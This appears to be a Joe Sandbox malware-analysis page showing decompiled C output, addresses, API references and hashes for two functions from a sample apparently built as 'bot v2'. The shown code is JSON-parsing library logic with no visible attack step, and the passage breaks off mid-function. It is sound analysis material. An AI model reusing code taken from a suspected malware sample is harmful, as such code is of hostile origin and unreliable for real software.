Function 004217E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 250
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004217E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v272;
				intOrPtr _v276;
				signed char _v277;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				signed int _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				signed int _v352;
				char _v376;
				char _v392;
				char _v408;
				char _v420;
				char _v432;
				char _v444;
				char _v456;
				char _v488;
				char _v520;
				signed int _t107;
				signed char _t109;
				signed char _t115;
				void* _t117;
				intOrPtr _t129;
				signed char _t148;
				void* _t156;
				intOrPtr _t164;
				signed int _t250;
				signed int _t261;
				void* _t262;
				void* _t264;

				_t260 = __esi;
				_t259 = __edi;
				_t176 = __ebx;
				_t107 =  *0x4c61a4; // 0x8656a166
				_v8 = _t107 ^ _t261;
				_v276 = __ecx;
				_t109 = E00417370(_v276, __eflags);
				_t268 = _t109 & 0x000000ff;
				if((_t109 & 0x000000ff) == 0) {
					E00415B60( &_v376, _a8,  *(_v276 + 0x98) & 0x000000ff);
					_t245 =  &_v376;
					E00413430(__ebx, _v276, __edi, __esi, __fp0,  &_v376);
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						__eflags = E00420190(_v276) - 0xf;
						if(__eflags != 0) {
							_v348 = E00414FA0( &_v408, 0);
							E00415310( &_v32, __eflags, "value");
							_v344 = E0041F5F0(__ebx, _v276, __edi, __esi, __eflags,  &_v128, 0xf,  &_v32);
							_v320 = _v276 + 0x30;
							_v340 = E00420140(_v320,  &_v444);
							_t129 = E0040C460(__ebx, __edi, __esi, __eflags,  &_v520, 0x65, _v340, _v344, _v348);
							_t262 = _t262 + 0x14;
							_v328 = _t129;
							_v336 = _v276 + 0x30;
							_v352 = E004201C0(_t176, _v336, _t259, _t260,  &_v152);
							_t250 = _v276 + 0x30;
							__eflags = _t250;
							_v332 = _t250;
							_v324 = E00417420(E00420140(_v332,  &_v456));
							_t245 = _v352;
							E00412130( &_v376, _v324, _v352, _v328);
							E00416980( &_v152);
							E00416D90( &_v520);
							E00416980( &_v128);
							E00416980( &_v32);
							E00416950( &_v408);
						}
					}
					_t115 = E00420C70( &_v376);
					__eflags = _t115 & 0x000000ff;
					if((_t115 & 0x000000ff) == 0) {
						E00416A30( &_v376);
						L15:
						_t117 = E0041AA20(_a8, 1);
						goto L16;
					} else {
						E00415180(_t262 - 0x10, 9);
						E00416EA0(_a8);
						_t117 = E00416A30( &_v376);
						L16:
						return E00424900(_t117, _t176, _v8 ^ _t261, _t245, _t259, _t260);
					}
				}
				_v277 =  *(_v276 + 0x98);
				_push(_v277 & 0x000000ff);
				_t264 = _t262 - 0x28;
				E00415910(_t264, _t268, _v276);
				_push(_a8);
				E00415AC0( &_v272, _t268);
				E004121F0(__ebx, _v276, __edi, __esi, __fp0,  &_v272);
				_t245 = _a4 & 0x000000ff;
				if((_a4 & 0x000000ff) != 0) {
					_t156 = E00420190(_v276);
					_t270 = _t156 - 0xf;
					if(_t156 != 0xf) {
						_v288 = E00414FA0( &_v392, 0);
						E00415310( &_v56, _t270, "value");
						_v292 = E0041F5F0(__ebx, _v276, __edi, __esi, _t270,  &_v80, 0xf,  &_v56);
						_v284 = _v276 + 0x30;
						_v296 = E00420140(_v284,  &_v420);
						_t164 = E0040C460(__ebx, __edi, __esi, _t270,  &_v488, 0x65, _v296, _v292, _v288);
						_t264 = _t264 + 0x14;
						_v308 = _t164;
						_v300 = _v276 + 0x30;
						_v312 = E004201C0(_t176, _v300, _t259, _t260,  &_v104);
						_v304 = _v276 + 0x30;
						_v316 = E00417420(E00420140(_v304,  &_v432));
						_t245 = _v316;
						E00412100( &_v272, _v316, _v312, _v308);
						E00416980( &_v104);
						E00416D90( &_v488);
						E00416980( &_v80);
						E00416980( &_v56);
						E00416950( &_v392);
					}
				}
				_t148 = E00420C50( &_v272);
				_t272 = _t148 & 0x000000ff;
				if((_t148 & 0x000000ff) == 0) {
					__eflags = E00420C20(_a8) & 0x000000ff;
					if(__eflags != 0) {
						E00414FA0(_t264 - 0x10, 0);
						E00416EA0(_a8);
					}
					E004169E0( &_v272, __eflags);
					goto L15;
				}
				E00415180(_t264 - 0x10, 9);
				E00416EA0(_a8);
				_t117 = E004169E0( &_v272, _t272);
				goto L16;
			}

0x004217e0
0x004217e0
0x004217e0
0x004217e9
0x004217f0
0x004217f3
0x004217ff
0x00421807
0x00421809
0x00421a2a
0x00421a2f
0x00421a3c
0x00421a45
0x00421a47
0x00421a58
0x00421a5b
0x00421a6e
0x00421a7c
0x00421a96
0x00421aa5
0x00421abd
0x00421ae1
0x00421ae6
0x00421ae9
0x00421af8
0x00421b10
0x00421b1c
0x00421b1c
0x00421b1f
0x00421b3e
0x00421b4b
0x00421b5f
0x00421b6a
0x00421b75
0x00421b7d
0x00421b85
0x00421b90
0x00421b90
0x00421a5b
0x00421b9b
0x00421ba3
0x00421ba5
0x00421bce
0x00421bd3
0x00421bd8
0x00000000
0x00421ba7
0x00421bae
0x00421bb6
0x00421bc1
0x00421bdd
0x00421bea
0x00421bea
0x00421ba5
0x0042181b
0x00421828
0x00421829
0x00421835
0x0042183d
0x00421844
0x00421856
0x0042185b
0x00421861
0x0042186d
0x00421872
0x00421875
0x00421888
0x00421896
0x004218b0
0x004218bf
0x004218d7
0x004218fb
0x00421900
0x00421903
0x00421912
0x00421927
0x00421936
0x00421955
0x00421969
0x00421976
0x0042197e
0x00421989
0x00421991
0x00421999
0x004219a4
0x004219a4
0x00421875
0x004219af
0x004219b7
0x004219b9
0x004219ea
0x004219ec
0x004219f5
0x004219fd
0x004219fd
0x00421a08
0x00000000
0x00421a08
0x004219c2
0x004219ca
0x004219d5
0x00000000

APIs

Part of subcall function 00417370: std::ios_base::good.LIBCPMTD ref: 0041737C

shared_ptr.LIBCMTD ref: 00421835

Part of subcall function 00415AC0: shared_ptr.LIBCMTD ref: 00415B13

Part of subcall function 0041F5F0: _Func_class.LIBCPMTD ref: 0041F619
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F658
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F660
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F716
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F71E
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F729
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F734
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F73F

Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C544
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C54C
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C554
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C55F
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C56A
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C572
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C57D
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C588
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C5C3

Part of subcall function 004201C0: task.LIBCPMTD ref: 0042028A

task.LIBCPMTD ref: 0042197E
task.LIBCPMTD ref: 00421991
task.LIBCPMTD ref: 00421999
task.LIBCPMTD ref: 00421B6A
task.LIBCPMTD ref: 00421B7D
task.LIBCPMTD ref: 00421B85

Strings

value, xrefs: 0042188E, 00421A74

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$shared_ptr$Func_classstd::ios_base::good
String ID: value
API String ID: 3091582265-494360628
Opcode ID: b7d24b1dd670e3d0e0b9a49042a992a6f48e32cebfc4025eedfc9d0c74160924
Instruction ID: dfcb893894138c7871378da836a4d813f5a6c738ee5429a603fd32520c85f1b6
Opcode Fuzzy Hash: b7d24b1dd670e3d0e0b9a49042a992a6f48e32cebfc4025eedfc9d0c74160924
Instruction Fuzzy Hash: 47B13D70A101289BCB29EB65DC92BEEB7B5AF58304F4041DEA10DA7292DB745FC4CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00412260 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00412260(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed char _t462;
				signed char _t465;
				intOrPtr _t471;
				signed char _t473;
				signed char _t476;
				void* _t477;
				signed char _t499;
				signed char _t507;
				void* _t554;
				signed char _t575;
				signed char _t648;
				signed int _t875;
				void* _t877;

				L0:
				while(1) {
					L0:
					_t874 = __esi;
					_t873 = __edi;
					_t651 = __ebx;
					_t462 = E004241B0(__ebx,  *((intOrPtr*)(_t875 + 8)), __edi, __esi, __eflags, 0xffffffff);
					_t837 = _t462 & 0x000000ff;
					if((_t462 & 0x000000ff) == 0) {
						break;
					}
					L6:
					__eflags = E00420190( *(_t875 - 0x2a8)) - 0xb;
					if(__eflags != 0) {
						L10:
						__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 4;
						if(__eflags == 0) {
							L12:
							_t465 = E00420D60( *((intOrPtr*)(_t875 + 8)), __eflags, E00420170( *(_t875 - 0x2a8) + 0x30));
							_t837 = _t465 & 0x000000ff;
							__eflags = _t465 & 0x000000ff;
							if((_t465 & 0x000000ff) != 0) {
								L14:
								__eflags = E00420190( *(_t875 - 0x2a8)) - 0xc;
								if(__eflags == 0) {
									L16:
									 *((char*)(_t875 - 0x2c1)) = 0;
									E00422090(_t875 - 0x2bc, _t875 - 0x2c1);
									E00420190( *(_t875 - 0x2a8));
									goto L1;
								} else {
									L15:
									 *((intOrPtr*)(_t875 - 0x3d4)) = E00414FA0(_t875 - 0x434, 0);
									E00415310(_t875 - 0x4c, __eflags, "object separator");
									 *((intOrPtr*)(_t875 - 0x3d8)) = E0041F5F0(__ebx,  *(_t875 - 0x2a8), __edi, __esi, __eflags, _t875 - 0x154, 0xc, _t875 - 0x4c);
									 *((intOrPtr*)(_t875 - 0x3d0)) =  *(_t875 - 0x2a8) + 0x30;
									 *((intOrPtr*)(_t875 - 0x3dc)) = E00420140( *((intOrPtr*)(_t875 - 0x3d0)), _t875 - 0x534);
									 *((intOrPtr*)(_t875 - 0x3e8)) = E0040C460(__ebx, __edi, __esi, __eflags, _t875 - 0x5e4, 0x65,  *((intOrPtr*)(_t875 - 0x3dc)),  *((intOrPtr*)(_t875 - 0x3d8)),  *((intOrPtr*)(_t875 - 0x3d4)));
									 *((intOrPtr*)(_t875 - 0x3e0)) =  *(_t875 - 0x2a8) + 0x30;
									 *((intOrPtr*)(_t875 - 0x3ec)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x3e0)), _t873, _t874, _t875 - 0x13c);
									 *((intOrPtr*)(_t875 - 0x3e4)) =  *(_t875 - 0x2a8) + 0x30;
									 *(_t875 - 0x3f0) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x3e4)), _t875 - 0x540));
									_t837 =  *(_t875 - 0x3f0);
									 *((char*)(_t875 - 0x2c0)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x3f0),  *((intOrPtr*)(_t875 - 0x3ec)),  *((intOrPtr*)(_t875 - 0x3e8)));
									E00416980(_t875 - 0x13c);
									E00416D90(_t875 - 0x5e4);
									E00416980(_t875 - 0x154);
									E00416980(_t875 - 0x4c);
									E00416950(_t875 - 0x434);
									E00416CE0(_t875 - 0x2bc);
									_t471 =  *((intOrPtr*)(_t875 - 0x2c0));
								}
							} else {
								L13:
								 *((char*)(_t875 - 0x2bf)) = 0;
								E00416CE0(_t875 - 0x2bc);
								_t471 =  *((intOrPtr*)(_t875 - 0x2bf));
							}
						} else {
							L11:
							 *((intOrPtr*)(_t875 - 0x3b0)) = E00414FA0(_t875 - 0x444, 0);
							E00415310(_t875 - 0x34, __eflags, "object key");
							 *((intOrPtr*)(_t875 - 0x3b4)) = E0041F5F0(__ebx,  *(_t875 - 0x2a8), __edi, __esi, __eflags, _t875 - 0x124, 4, _t875 - 0x34);
							 *((intOrPtr*)(_t875 - 0x3ac)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3b8)) = E00420140( *((intOrPtr*)(_t875 - 0x3ac)), _t875 - 0x51c);
							 *(_t875 - 0x3c4) = E0040C460(__ebx, __edi, __esi, __eflags, _t875 - 0x5c4, 0x65,  *((intOrPtr*)(_t875 - 0x3b8)),  *((intOrPtr*)(_t875 - 0x3b4)),  *((intOrPtr*)(_t875 - 0x3b0)));
							 *((intOrPtr*)(_t875 - 0x3bc)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3c8)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x3bc)), _t873, _t874, _t875 - 0x10c);
							 *((intOrPtr*)(_t875 - 0x3c0)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3cc)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x3c0)), _t875 - 0x528));
							_t837 =  *(_t875 - 0x3c4);
							 *((char*)(_t875 - 0x2be)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x3cc)),  *((intOrPtr*)(_t875 - 0x3c8)),  *(_t875 - 0x3c4));
							E00416980(_t875 - 0x10c);
							E00416D90(_t875 - 0x5c4);
							E00416980(_t875 - 0x124);
							E00416980(_t875 - 0x34);
							E00416950(_t875 - 0x444);
							E00416CE0(_t875 - 0x2bc);
							_t471 =  *((intOrPtr*)(_t875 - 0x2be));
						}
					} else {
						L7:
						_t648 = E0041F190(__ebx,  *((intOrPtr*)(_t875 + 8)), __edi, __esi, __eflags);
						__eflags = _t648 & 0x000000ff;
						if((_t648 & 0x000000ff) != 0) {
							L9:
							L49:
							L51:
							_t473 = E0041EDD0(_t875 - 0x2bc);
							_t837 = _t473 & 0x000000ff;
							__eflags = _t473 & 0x000000ff;
							if(__eflags == 0) {
								L53:
								_t476 = E004172F0(E0041ACC0(_t875 - 0x2bc, _t875 - 0x44c), __eflags);
								__eflags = _t476 & 0x000000ff;
								if((_t476 & 0x000000ff) == 0) {
									L63:
									_t477 = E00420190( *(_t875 - 0x2a8));
									__eflags = _t477 - 0xd;
									if(_t477 != 0xd) {
										L71:
										__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 0xb;
										if(__eflags != 0) {
											L77:
											 *((intOrPtr*)(_t875 - 0x38c)) = E00414FA0(_t875 - 0x4bc, 0);
											E00415310(_t875 - 0xc4, __eflags, "object");
											 *((intOrPtr*)(_t875 - 0x390)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x2a4, 0xb, _t875 - 0xc4);
											 *((intOrPtr*)(_t875 - 0x388)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x394)) = E00420140( *((intOrPtr*)(_t875 - 0x388)), _t875 - 0x504);
											 *(_t875 - 0x3a0) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x6a4, 0x65,  *((intOrPtr*)(_t875 - 0x394)),  *((intOrPtr*)(_t875 - 0x390)),  *((intOrPtr*)(_t875 - 0x38c)));
											 *((intOrPtr*)(_t875 - 0x398)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x3a4)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x398)), _t873, _t874, _t875 - 0x28c);
											 *((intOrPtr*)(_t875 - 0x39c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x3a8)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x39c)), _t875 - 0x510));
											_t837 =  *(_t875 - 0x3a0);
											 *((char*)(_t875 - 0x2d5)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x3a8)),  *((intOrPtr*)(_t875 - 0x3a4)),  *(_t875 - 0x3a0));
											E00416980(_t875 - 0x28c);
											E00416D90(_t875 - 0x6a4);
											E00416980(_t875 - 0x2a4);
											E00416980(_t875 - 0xc4);
											E00416950(_t875 - 0x4bc);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d5));
										} else {
											L72:
											_t499 = E0041F190(_t651,  *((intOrPtr*)(_t875 + 8)), _t873, _t874, __eflags);
											_t837 = _t499 & 0x000000ff;
											__eflags = _t499 & 0x000000ff;
											if((_t499 & 0x000000ff) != 0) {
												L74:
												__eflags = E0041EDD0(_t875 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2ba1);
													E00430DB7(_t651, _t837, _t873, _t874, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t877 = _t877 + 0xc;
												}
												E00421D70(_t875 - 0x2bc, __eflags);
												 *(_t875 - 0x2a9) = 1;
												goto L1;
											} else {
												L73:
												 *((char*)(_t875 - 0x2d4)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2d4));
											}
										}
									} else {
										L64:
										__eflags = E00420190( *(_t875 - 0x2a8)) - 4;
										if(__eflags == 0) {
											L66:
											_t507 = E00420D60( *((intOrPtr*)(_t875 + 8)), __eflags, E00420170( *(_t875 - 0x2a8) + 0x30));
											__eflags = _t507 & 0x000000ff;
											if((_t507 & 0x000000ff) != 0) {
												L68:
												__eflags = E00420190( *(_t875 - 0x2a8)) - 0xc;
												if(__eflags == 0) {
													L70:
													E00420190( *(_t875 - 0x2a8));
													goto L1;
												} else {
													L69:
													 *((intOrPtr*)(_t875 - 0x368)) = E00414FA0(_t875 - 0x4ac, 0);
													E00415310(_t875 - 0xac, __eflags, "object separator");
													 *((intOrPtr*)(_t875 - 0x36c)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x274, 0xc, _t875 - 0xac);
													 *((intOrPtr*)(_t875 - 0x364)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x370)) = E00420140( *((intOrPtr*)(_t875 - 0x364)), _t875 - 0x4ec);
													 *((intOrPtr*)(_t875 - 0x37c)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x684, 0x65,  *((intOrPtr*)(_t875 - 0x370)),  *((intOrPtr*)(_t875 - 0x36c)),  *((intOrPtr*)(_t875 - 0x368)));
													 *((intOrPtr*)(_t875 - 0x374)) =  *(_t875 - 0x2a8) + 0x30;
													 *(_t875 - 0x380) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x374)), _t873, _t874, _t875 - 0x25c);
													 *((intOrPtr*)(_t875 - 0x378)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x384)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x378)), _t875 - 0x4f8));
													_t837 =  *(_t875 - 0x380);
													 *((char*)(_t875 - 0x2d3)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x384)),  *(_t875 - 0x380),  *((intOrPtr*)(_t875 - 0x37c)));
													E00416980(_t875 - 0x25c);
													E00416D90(_t875 - 0x684);
													E00416980(_t875 - 0x274);
													E00416980(_t875 - 0xac);
													E00416950(_t875 - 0x4ac);
													E00416CE0(_t875 - 0x2bc);
													_t471 =  *((intOrPtr*)(_t875 - 0x2d3));
												}
											} else {
												L67:
												 *((char*)(_t875 - 0x2d2)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2d2));
											}
										} else {
											L65:
											 *((intOrPtr*)(_t875 - 0x344)) = E00414FA0(_t875 - 0x49c, 0);
											E00415310(_t875 - 0x94, __eflags, "object key");
											 *((intOrPtr*)(_t875 - 0x348)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x244, 4, _t875 - 0x94);
											 *((intOrPtr*)(_t875 - 0x340)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x34c)) = E00420140( *((intOrPtr*)(_t875 - 0x340)), _t875 - 0x4d4);
											 *((intOrPtr*)(_t875 - 0x358)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x664, 0x65,  *((intOrPtr*)(_t875 - 0x34c)),  *((intOrPtr*)(_t875 - 0x348)),  *((intOrPtr*)(_t875 - 0x344)));
											 *((intOrPtr*)(_t875 - 0x350)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x35c)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x350)), _t873, _t874, _t875 - 0x22c);
											 *((intOrPtr*)(_t875 - 0x354)) =  *(_t875 - 0x2a8) + 0x30;
											 *(_t875 - 0x360) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x354)), _t875 - 0x4e0));
											_t837 =  *(_t875 - 0x360);
											 *((char*)(_t875 - 0x2d1)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x360),  *((intOrPtr*)(_t875 - 0x35c)),  *((intOrPtr*)(_t875 - 0x358)));
											E00416980(_t875 - 0x22c);
											E00416D90(_t875 - 0x664);
											E00416980(_t875 - 0x244);
											E00416980(_t875 - 0x94);
											E00416950(_t875 - 0x49c);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d1));
										}
									}
								} else {
									L54:
									_t554 = E00420190( *(_t875 - 0x2a8));
									__eflags = _t554 - 0xd;
									if(_t554 != 0xd) {
										L56:
										_t837 =  *(_t875 - 0x2a8);
										__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 0xa;
										if(__eflags != 0) {
											L62:
											 *((intOrPtr*)(_t875 - 0x320)) = E00414FA0(_t875 - 0x48c, 0);
											E00415310(_t875 - 0x1c, __eflags, "array");
											 *((intOrPtr*)(_t875 - 0x324)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x214, 0xa, _t875 - 0x1c);
											 *((intOrPtr*)(_t875 - 0x31c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x328)) = E00420140( *((intOrPtr*)(_t875 - 0x31c)), _t875 - 0x588);
											 *((intOrPtr*)(_t875 - 0x334)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x644, 0x65,  *((intOrPtr*)(_t875 - 0x328)),  *((intOrPtr*)(_t875 - 0x324)),  *((intOrPtr*)(_t875 - 0x320)));
											 *((intOrPtr*)(_t875 - 0x32c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x338)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x32c)), _t873, _t874, _t875 - 0xdc);
											 *((intOrPtr*)(_t875 - 0x330)) =  *(_t875 - 0x2a8) + 0x30;
											 *(_t875 - 0x33c) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x330)), _t875 - 0x4c8));
											_t837 =  *(_t875 - 0x33c);
											 *((char*)(_t875 - 0x2d0)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x33c),  *((intOrPtr*)(_t875 - 0x338)),  *((intOrPtr*)(_t875 - 0x334)));
											E00416980(_t875 - 0xdc);
											E00416D90(_t875 - 0x644);
											E00416980(_t875 - 0x214);
											E00416980(_t875 - 0x1c);
											E00416950(_t875 - 0x48c);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d0));
										} else {
											L57:
											_t575 = E0041F000(_t651,  *((intOrPtr*)(_t875 + 8)), _t873, _t874, __eflags);
											__eflags = _t575 & 0x000000ff;
											if((_t575 & 0x000000ff) != 0) {
												L59:
												__eflags = E0041EDD0(_t875 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2b6b);
													E00430DB7(_t651, _t837, _t873, _t874, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t877 = _t877 + 0xc;
												}
												E00421D70(_t875 - 0x2bc, __eflags);
												 *(_t875 - 0x2a9) = 1;
												goto L1;
											} else {
												L58:
												 *((char*)(_t875 - 0x2cf)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2cf));
											}
										}
									} else {
										L55:
										E00420190( *(_t875 - 0x2a8));
										L1:
										while(1 != 0) {
											if(( *(_t875 - 0x2a9) & 0x000000ff) != 0) {
												L50:
												 *(_t875 - 0x2a9) = 0;
												goto L51;
											} else {
												L3:
												_t837 =  *(_t875 - 0x2a8);
												 *(_t875 - 0x2dc) =  *( *(_t875 - 0x2a8) + 0x28);
												if( *(_t875 - 0x2dc) > 0x10) {
													L48:
													 *((intOrPtr*)(_t875 - 0x2fc)) = E00414FA0(_t875 - 0x47c, 0);
													E00415310(_t875 - 0x7c, __eflags, "value");
													 *((intOrPtr*)(_t875 - 0x300)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x1fc, 0x10, _t875 - 0x7c);
													 *((intOrPtr*)(_t875 - 0x2f8)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x304)) = E00420140( *((intOrPtr*)(_t875 - 0x2f8)), _t875 - 0x570);
													 *(_t875 - 0x310) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x624, 0x65,  *((intOrPtr*)(_t875 - 0x304)),  *((intOrPtr*)(_t875 - 0x300)),  *((intOrPtr*)(_t875 - 0x2fc)));
													 *((intOrPtr*)(_t875 - 0x308)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x314)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x308)), _t873, _t874, _t875 - 0x1e4);
													 *((intOrPtr*)(_t875 - 0x30c)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x318)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x30c)), _t875 - 0x57c));
													_t837 =  *(_t875 - 0x310);
													 *((char*)(_t875 - 0x2cd)) = E00412100( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x318)),  *((intOrPtr*)(_t875 - 0x314)),  *(_t875 - 0x310));
													E00416980(_t875 - 0x1e4);
													E00416D90(_t875 - 0x624);
													E00416980(_t875 - 0x1fc);
													E00416980(_t875 - 0x7c);
													E00416950(_t875 - 0x47c);
													E00416CE0(_t875 - 0x2bc);
													_t471 =  *((intOrPtr*)(_t875 - 0x2cd));
												} else {
													L4:
													switch( *((intOrPtr*)( *(_t875 - 0x2dc) * 4 +  &M004133E4))) {
														case 0:
															goto L48;
														case 1:
															L35:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF30( *(__ebp + 8), 1);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L37:
																goto L49;
															} else {
																L36:
																 *((char*)(__ebp - 0x2c8)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c8));
															}
															goto L79;
														case 2:
															L29:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF30(__ecx, 0);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L31:
																goto L49;
															} else {
																L30:
																 *((char*)(__ebp - 0x2c6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c6));
															}
															goto L79;
														case 3:
															L32:
															__ecx =  *(__ebp + 8);
															E00421690(__ecx) = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L34:
																goto L49;
															} else {
																L33:
																 *((char*)(__ebp - 0x2c7)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c7));
															}
															goto L79;
														case 4:
															L41:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
															__ecx =  *(__ebp + 8);
															__eax = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L43:
																goto L49;
															} else {
																L42:
																 *((char*)(__ebp - 0x2ca)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2ca));
															}
															goto L79;
														case 5:
															L44:
															__ecx =  *(__ebp - 0x2a8);
